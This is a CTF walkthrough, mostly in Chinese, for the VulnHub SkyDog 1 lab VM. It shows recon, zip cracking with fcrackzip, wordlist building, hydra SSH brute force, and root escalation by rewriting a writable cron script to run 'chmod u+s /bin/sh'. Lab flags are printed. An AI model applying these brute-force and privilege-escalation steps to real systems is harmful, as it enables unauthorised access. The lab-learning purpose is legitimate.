SkyDog: 1
References
- https://www.vulnhub.com/entry/skydog-1,142/
- http://www.hackingarticles.in/hack-skydog-vm-ctf-challenge/
Writeup
- Recon:
root@kali:~# nmap -A 10.0.2.145 -p- ... 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-robots.txt: 252 disallowed entries (15 shown) | /search /sdch /groups /catalogs /catalogues /news /nwshp | /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl |_/addurl/image? /mail/ /pagead/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn't have a title (text/html). - http://10.0.2.145/ 下只有一張圖片,查看exif資訊:
root@kali:~/Downloads# exiftool SkyDogCon_CTF.jpg ExifTool Version Number : 10.28 File Name : SkyDogCon_CTF.jpg ... XP Comment : flag{abc40a2d4e023b42bd1ff04891549ae2} ...- 解碼flag看看,拿去MD5 Decrypter得到:
Welcome Home
- 解碼flag看看,拿去MD5 Decrypter得到:
- http://10.0.2.145/robots.txt 得到
flag{cd4f10fcba234f0e8b2f60a490c306e6}- MD5 Decrypter得到:
Bots
- MD5 Decrypter得到:
- 使用nikto掃一下網站:
root@kali:~/Downloads# nikto -h 10.0.2.145 - Nikto v2.1.6 ... + Entry '/index.html?' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/?/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/?hl=/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/?hl=*&/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/?hl=*&gws_rd=ssl$/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/?hl=*&*&gws_rd=ssl/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/?gws_rd=ssl$/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/?pt1=true$/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Setec/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 299 entries which should be manually viewed. ...- http://10.0.2.145/Setec/ 檢視原始碼:
<img src="./Astronomy/Setec_Astronomy.jpg" width="1024" height="768" alt="" />
- http://10.0.2.145/Setec/ 檢視原始碼:
- 瀏覽http://10.0.2.145/Setec/Astronomy ,發現Whistler.zip檔
- 檔案有加密,使用fcrackzip暴力破解:
root@kali:~/Downloads# fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt Whistler.zip found file 'flag.txt', (size cp/uc 50/ 38, flags 9, chk 874a) found file 'QuesttoFindCosmo.txt', (size cp/uc 72/ 61, flags 9, chk 83b5) PASSWORD FOUND!!!!: pw == yourmother - 得到
flag{1871a3c1da602bf471d3d76cc60cdb9b},MD5 Decrypter得到:yourmother
- 檔案有加密,使用fcrackzip暴力破解:
- 另個檔案提示:
root@kali:~/Downloads# cat QuesttoFindCosmo.txt Time to break out those binoculars and start doing some OSINT- 根據一些關鍵字,例如binoculars、cosmo和bishop,google可找到Sneaker這部電影
- 使用cewl蒐集字典檔:
cewl --depth 1 http://www.imdb.com/title/tt0105435/trivia?ref_=tt_trv_trv -w /root/Desktop/sneakers.txt- or
cewl --depth 1 http://www.thealmightyguru.com/Reviews/Sneakers/Docs/Sneakers-Script.txt -w /root/Desktop/sneakers.txt
- 使用
dirb進行目錄暴破:root@kali:~/Desktop# dirb http://10.0.2.145 /root/Desktop/sneakers.txt ... GENERATED WORDS: 22905 ---- Scanning URL: http://10.0.2.145/ ---- ==> DIRECTORY: http://10.0.2.145/PlayTronics/ ==> DIRECTORY: http://10.0.2.145/Setec/ ---- Entering directory: http://10.0.2.145/PlayTronics/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.0.2.145/Setec/ ---- ==> DIRECTORY: http://10.0.2.145/Setec/Astronomy/ ---- Entering directory: http://10.0.2.145/Setec/Astronomy/ ---- ... - http://10.0.2.145/PlayTronics/ 得到
flag{c07908a705c22922e6d416e0e1107d99},解密後為leroybrown
- 另個檔案companytraffic.pcap
- 使用wireshark過濾http,發現有個mp3檔,內容為:
Hi. My Name Is Werner Brandes. My Voice Is My Passport. Verify Me.,同樣是Snearker電影的台詞(https://www.youtube.com/watch?v=-zVgWpVXb64)。 - 因此werner brandes可能是帳號,利用先前得到的資訊leroybrown,hydra暴破ssh,最後得到密碼為:
leroybrownhydra -l wernerbrandes -P /root/Desktop/sneakers.txt ssh://10.0.2.145 - 登入SSH:得到
flag{82ce8d8f5745ff6849fa7af1473c9b35},解密後為Dr. Gunter Janek
- 使用wireshark過濾http,發現有個mp3檔,內容為:
- 找可寫入檔案:
find / -writable -type f 2>/dev/null,發現/lib/log/sanitizer.py,這支程式是將/tmp/清空,我們假設它會定時執行。#!/usr/bin/env python import os import sys try: os.system('rm -r /tmp/* ') except: sys.exit()- 將
rm -r /tmp/*替換為chmod u+s /bin/sh(註:將當前user設為setuid) - 過一會,系統會自動執行此script,並將當前user加入root group
- 原先的
-rwxr-xr-x 1 root root 121272 Feb 19 2014 /bin/dash - 執行後
-rwsr-xr-x 1 root root 121272 Feb 19 2014 /bin/dash - 原先權限
uid=1001(wernerbrandes) gid=1001(wernerbrandes) groups=1001(wernerbrandes) - 執行後的
uid=1001(wernerbrandes) gid=1001(wernerbrandes) euid=0(root) groups=0(root),1001(wernerbrandes)
- 原先的
- 將
- 執行/bin/sh,瀏覽/root目錄,得到
flag{b70b205c96270be6ced772112e7dd03f}